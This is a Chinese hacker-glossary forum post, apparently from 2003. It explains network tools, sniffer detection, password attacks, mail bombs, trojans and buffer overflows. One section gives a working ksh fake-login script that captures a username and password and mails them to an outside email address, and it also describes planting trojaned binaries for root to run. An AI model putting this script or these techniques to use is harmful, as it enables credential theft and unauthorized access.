|
 | 作者: battle [battle]
 论坛用户 |
登录 |
| 黑客词汇解析 ● Event Viewer(事件观察器) 环境文件(Windows NT下),可显示系统、安全性和应用日志的图形程序。它处于Start菜单之下的Administrative Tool菜单中。当运行它的时候,在系统的记录中将显示一张事件表。它允许过滤显示,以展现一些类型的事件。安全记录包括违反安全规定,例如闭锁帐号等。利用User Manager的Audit Policy对话框所进行的审计等也将被写入这些日志中。 ● Network Monitor(网络监控器) 环境文件(Windows NT下),是一个监控网络应用的实用图形程序。它可以让你追获到网络上的分组及其他有关信息。它对监控网络的搜索特定分组以跟踪和解决安全问题。感觉不错的工具。 ● Finger(我想这个程序大家应该是很熟悉的了) 环境文件,用于显示远程系统上用户的目录名。它可以用于访问目录信息,比如说远程系统用户的电子邮件地址、用户名和电话号码等等。但是大多数系统因为有黑客使用它的缘故而不再提供和支持这个finger协议了(哈哈,看来成也黑客败也黑客)但实际上还有不少系统仍支持finger的请求的,只是通常会出现拒绝连接“connect refused”或者连接超时的错误)。你可以输入如:sem-xa@110.com,那么你就可以得到sem-xa的信息,你要是输入finger@110.com的话那么你就可以得到这个主 机上的所有用户信息。呵呵,这个地址你就别试了,是假的。 ● NBTStat 环境文件,用于显示NetBIOS网络名与IP地址间的映射关系,大多数NBTStat功能用于排错,但是其中之一对于黑客收集有关主机的信息来说很管用的。黑客可以输入一个主机的IP地址(nbtstat -a 110.110.110.110)就可以找出至少一个帐号,甚至是管理员的名字,当然了,条件是如果管理员登路的话。 ● Net 环境文件,可用于控制NetBIOS网络资源,它的命令几乎可以提供所有的NetBIOS网络功能,在这里我只能把它的子命令写出来,你可以一个个试试了:accounts、computer、print、send、name、use、user、view、pause、localgroup、share、config、file、continue、 group、help、stop、start、time、session、statistics …… ● Netstat 环境文件,用于显示当前TCP/IP的连接及状态。你可以输入/?参数的命令,就可以看到一些关于它的命令字符了。如果你想连续监听正在进行的连接状态的话,你可以利用间隔设定定期、自动刷新显示(例如:netstat -a 5)这样将会在5秒内显示一次全部的TCP/IP连接状况,包括服务器监听的端口,想停止它按Ctrl+Break键即可…… ● Ping(子弹啊…呵呵) 环境文件,可用于发送ICMP回送报文到远程系统,以确定该系统是不是可进一步用于TCP/IP业务(也或者可以看你炸完了后的结果,~-~)。借助ping检测主机是否还存在工作,它在TCP/IP中常用动词“Did you ping the server?”。输入不带命令的ping参数你可以看到所描述的命令。简单的ping可以确定不正常对象的工作,但是要对一台远程机子执行ping命令成功的话,你可以对方物理层、数据链路层和网络层的所有功能是不是正确,通信问题一般发生在更高层。黑客可以将ping用语各种侵害网络的目的,比如说利用ping通过发送大量的ping(子弹)分组,引起淹没的无效数据。一台机用这种方式不能起到作用,但是有多台机子同时发送这个命令的话,那么……,这也是一种拒绝服务的攻击,这种攻击能够造成远程系统TCP/IP服务器的崩溃NT对这种攻击最为敏感…… ● Telnet(远程登录) Telnet的魔力在于它可以在两台远距离的机器之间模拟一种ASCII终端连接。许多路由器、交换机、防火墙,可以经过它连接到他们的IP地址进行配置,当然了,也可能被黑客远程配置,黑客可以经过telnet端口连接到IP。也可以经过防火墙阻断内部的telnet连接。telnet很多时候被黑客当作一种武器,因为telnet可以让你获得很多信息。在win95/98下可以运行telnet或者下一个NetTerm。 ● Tracert 可用于显示两个因特网通信主机间的路由器。由于大多数服务器在它的路由器接口采用有意义的名字,所以通常能够推断出两个主机间路由的有关情况…… ● NetAlert 这是一个过时但却常用的东西,不过我还是觉得蛮有用。它可用于监控目标TCP/IP服务的状态。它通过周期介入方式监测。当端口的状态开或者关的时候,它就会发邮件信息通知你。但是它需要邮件程序Blat1.2或者以上,才能利用邮件功能。 ● NAT(NetBIOS Auditing Tool) 从物理意义上看这个是一种NetBIOS安全审记或者监察工具,实质它的目的可以揭示NetBIOS网络中的安全缺陷,是比较实际的,现在有很多工具可用与此。它的功能之一就是自动口令检查,对黑客来说……呵呵。用它你可以针对一台NT服务器(好象对UNIX也可以耶)自动发出攻击,通过多次尝试帐号口令并试图经过NetBIOS进行连接(可以允许远程机器映射驱动器)。它可以接受帐号列表和口令列表,然后照着出现的次序针对每个帐号和口令进行攻击…… 它接受三种命令参数: -o(指定重定向输出到的记录文件) -u(指定帐号的文本文件) -p(指定针对每个帐号的口令的文本文件) 不过现在有很多方法可以阻止NAT的攻击,比如通过重命名Administrator帐号和限制Administrator帐号注册网络等…… ● Ethernet Sniffer Sniffer是如今众多的网络闯入的一种途径,计算机在网络中虽然是共享信道,但是它一般只接受信息包中的目的地址与自己网络地址相符的信息包,而不接受网上传输的发往其它计算机的信息包。除了广播包,这些信息包的头目的地址全部都是0或者1,因此网络上所有的计算机都可以阅读它。但如果某台机器可以接受所有信息,而不论这些信息是发给谁的,那么这台机器就可以称之为Sniffer。它可能是网络中的系统管理员用语管理的,但是大多时候是黑客用来入侵机器的。由于帐号与口令在以太网上是以文本格式传输的,因此,黑客要是有办法控制Sniffer的话,那么网络上的所有机器便处于危险之中。 ● 如何知道自己是否被窃听 窃听可能是通过专用的硬件,也可能是通过运行一些窃听软件执行的。首先要沿着网络的物理布线边走边仔细地检查网络的每一个连接处。排除硬件上的可能性后,接下来就检测是否有软件窃听。当窃听程序运行的时候,被窃听的计算机的端口会被改成许偌模式,在这种方式下,才能够窃听到所有的数据包。在SunOs、NetBSD和基于BSD的Unix系统下运行“ifconfig -a”命令,它会告诉你该机器所有端口的信息,以及他们是否处于危险的许偌模式下。在DEC OSF/1和IRIX等系统中就没有这么方便了,需要你指定检测哪个端口才行的。在这种情况下可以先运行netstat -r来看看有多少个端口。找到了端口后就用#ifconfig le0来检测……(一般有经验的入侵者会把“ifconfig”这类命令替换掉,以用来逃避检测。这时你可以用一些工具,像cpm就可以自动检测端口,它运行在SunOS操作系统下。)一些窃听程序运行时,它会通过访问数据包设备把正在网络上传输的数据包复制一份,存储到网络主机上,形成一个随时间不断增长的文件,这个文件通常很大,在一个流通量高的网络上,这个文件会更加庞大的。有一种叫Lsof(List Open Files)的工具能够查找出这些不断增长的文件,并能够找出正在访问数据包设备的程序,在SunOS中这个设备名是/dev/nit。 ● 取得口令文件的简捷方法 1、在能访问对方机器的情况下,把shell命令用ksh运行即可。如下: clear stty ignbrk echo"login:\c" read logname stty -echo echo"password:\C" read passwd print"\nlogin incorrect\n" print $logname $passwd | mail cxterm.bbs@jet.ncic.an.cn stty 0 stty echo exit 2、在自己能用的目录里放上“ls”、“grep”之类的程序,希望root能不小心运行到它们(嘿嘿。虽然有些像守株待兔,但是大多时候你必须这样),root一旦运行,你就可以获得root权限。所以root的PATH里不应当有“.”的当前目录。 3、更彻底的方法是根据passwd文件里的密文算口令的明文。首先你必须取得对方含有密文的passwd文件(如果是有shadow“影子”passwd的机器上需要取得/etc/shadow)。如果得到后你可以借助一些工具把这个文件还原成可视的密码原文。现在大多数的工具都开始傻瓜化了,所以在这方面操作也就简单了。在国产中我偏爱小榕的“乱刀”…… ● 让你了解黑客攻击口令的手段 黑客攻击目标的时候一般都是把破解不同用户的口令作为攻击的开始。他们先用“finger远端主机名”找出主机上的用户帐号,然后就采用字典穷举法进行攻击。它的原理是根据网络上的用户常常采用的一些E文单词或者自己的姓氏作为口令的实际情况,通过一些程序自动地从机器字典中取出一个单词作为用户的口令输入给远程的主机尝试进入系统。若是口令错误,就按次序取出下一个单词这样循环下去,直到找出正确的口令或者字典的单词用完为止(这是一种吐血加上网费用高涨的形式,我不能如此,呵呵)。最典型的字典代表就是LetMeIn version 2.0了,而我更是喜欢国产的像浩哥的“万用钥匙”和小榕的“黑客字典”等(不过你可以因环境地域的不同而用比较适合主机所在地的原产字典)。要是这些以上的方法不行的话,黑客就会寻找目标机器的薄弱环节和安全方面的漏洞,伺机夺取目标中存放的口令文件passwd或shadow。现在的Unix系统,用户的基本信息存放在passwd文件中,而所有的口令则经过DES加密法加密后专门存放在一个叫做"shadow"(影子)的文件中,并且处于严密的保护之下。老版的Unix没有shadow文件,它的口令都放在passwd文件中。要是获得了口令,那么黑客就会用专门破解DES加密法的程序来破解口令。 ● E-mail bomb 电子信箱炸弹 信箱炸弹也是一般黑客常用的攻击手段之一。相对于其它的手段来说mail bomb可谓简单快洁。所谓的信箱炸弹实际是一个地址不详、容量很大、充满乱码或脏话的恶意邮件,也是垃圾邮件。每个人的邮件信箱都是有限空间的,所以当这种大量的垃圾到了你的信箱之后就会导致信箱容量不够而把正常的邮件冲掉,同时占用了大量的网络资源,而导致阻塞,使你不能正常运行系统。现在来说,网络你都可以下到很多这类邮件炸弹的程序,而且有逐渐普及的趋势。嘿嘿。看来我们都得有点准备才行。(我没用过邮件炸弹,因为从理念上来讲我认为邮件炸弹更像一种懦夫行为。)在邮件炸弹中最为典型的代表就是KaBoom!了,而现在的KaBoom! v3.0版更是比以前增加了很多功能,它可以不间断的发信,而常用的匿名邮件服务器的地址列表也都做在了程序里了,用户还可以自己增加新的功能。再就是可以为所攻击的人订阅一些大量邮件讨论组,还多了一些很搞笑的音效。启动这个程序后会出现一个小窗口,分别有3个按钮,它们为Mailbomber(炸人)、Mailing Lists(为别人订阅邮件组)和Close(退出),操作很简单。但我不希望你因我的这篇文章而去用它。因为很多时候它是比较另人感到厌恶的。 ● 特洛伊木马(Trojan horse) 我想这个大家应该是熟知的了。特洛伊木马是一类恶意的危害安全的程序,它和病毒的区别是特洛伊木马不可以自行传播,而是依靠寄生或人为的“种植”而传播的。最为著名的特洛伊木马称为PKZIP300,文件名称可能是PKZIP300.ZIP或者EXE文件了,看来似乎是PKZIP的最新版本。如果你发现了该程序最明智的选择就是别去下载,因为你要是运行了它,会把硬盘清除并干扰猫的使用。现在很大部分人分不清远程控制器和木马之间到底是一样呢还是不一样。其实它们区别很大,我在这里就不很详细的说明了,但是希望大家知道一点就是远程控制器所运行的环境则是需要一个木马来支持的(通常这个木马被称为S端,也就是服务端)。而很多时候这些是被黑客使用。 ● 关于PGP的介绍 PGP是E文“Pretty Good Privacy”(良好隐私)的缩写。它的创始者是USA的Phil Zimmermann。他把RSA公匙体系的安全方便和传统加密体系的告诉结合起来,并且在数字签名和密匙认证管理机制上有很好的设计,所以PGP是目前较为流行的加密软件包PGP目前运行在MS-DOS、Unix、VAX/AMS等各种不同类型的操作系统上的版本。它是一种大众使用的加密软件大家都知道在Internet上传输的数据是不加密的,所以如果你自己不保护自己的信息的话,那么可能被黑客利用而获得你的隐私……PGP的命令参数我看了就头晕,因为我只是爱好而已,所以不会花时间和精力去研究它的,但我知道有一个叫PGPSHELL的工具可以让你简单的生成自己的密匙。 ● 什么是缓冲区溢出 缓冲区溢出(bufer overflow)指的是一种系统攻击的手段,通过往程序的缓冲区写入超出其长度的内容,而造成缓冲区的溢出,从而破坏程序的堆栈,使程序转而执行其他的命令,以达到攻击的目的。而造成缓冲区溢出的原因是程序中没有仔细检查用户输入的参数。最为常见的手段是通过使某个特殊程序的缓冲区溢出而执行一个shell,通过shell的权限可以执行高级的命令。如果这个特殊程序属于root并且有suid的话,攻击者便可获得一个具有root权限的shell。那么是怎么样才可以制造缓冲区溢出呢?其实关于这些方面的实例在网上都有很多。你可以找找,别问我,我不知道。 |
| 地主 发表时间: 04-06-03 04:18 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 黑客词汇解析